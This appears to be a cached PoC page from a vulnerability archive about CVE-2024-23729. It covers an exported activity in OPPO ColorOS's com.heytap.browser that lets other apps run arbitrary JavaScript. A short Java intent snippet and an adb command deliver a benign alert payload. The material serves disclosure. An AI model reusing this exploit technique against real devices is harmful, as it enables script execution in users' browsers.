POC详情: bb2761e3b06b8185adfae5f7656ad08b4aceff42

来源
关联漏洞
标题: OPPO ColorOS Internet Browser com.heytap.browser 安全漏洞 (CVE-2024-23729)
描述:OPPO ColorOS Internet Browser com.heytap.browser是中国OPPO公司的一个安卓平台浏览器组件应用程序。 OPPO ColorOS Internet Browser com.heytap.browser 45.10.3.4.1版本存在安全漏洞,该漏洞源于允许远程攻击者通过组件执行任意JavaScript代码。
描述
CVE-2024-23729
介绍
## Vulnerability Report

### Overview:
A vulnerability has been discovered in the `com.heytap.browser` application on the Android platform. The vulnerability allows an attacker to execute arbitrary JavsScript code within the context of the application without any permissions.

### Application Details:

- **Vendor:** - ColorOS
- **Application Name:** 'Internet Browser' `com.heytap.browser`
- **Version:** 45.10.3.4.1
- **Component:** com.android.browser.RealBrowserActivity

### Vulnerability Details:

- **Vulnerability Type:** JavaScript Code Execution
- **Attack Vector:** Via an exported activity component
- **Permissions Required:** None

### Description:

The `com.android.browser.RealBrowserActivity` activity in the `com.heytap.browser` app is exported and can be invoked by any third-party application without requiring any permissions. A malicious app can exploit this to execute arbitrary JavaScript code within the context of the `com.heytap.browser`` application.


### Proof of Concept (PoC):


```
{
        super.onCreate(savedInstanceState);

        String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";

        Intent intent = new Intent(Intent.ACTION_VIEW);
        intent.setData(Uri.parse(javaScriptCommand));
        intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");

        startActivity(intent);

        finish();
    }
```

```

adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

```

![com heytap browser- 45 10 3 4 1-JS](https://github.com/user-attachments/assets/df6abee3-525e-45b0-8439-223707074010)
![poc-coloros](https://github.com/actuator/com.heytap.browser/assets/78701239/952f08c7-b8d6-4982-80bb-28b693b20134)




### Impact:

Successful exploitation allows an attacker to:
- Execute arbitrary JavaScript code within the context of the `com.heytap.browser` app.


文件快照

[4.0K] /data/pocs/bb2761e3b06b8185adfae5f7656ad08b4aceff42 ├── [1.5K] CVE-2024-23729 └── [1.9K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。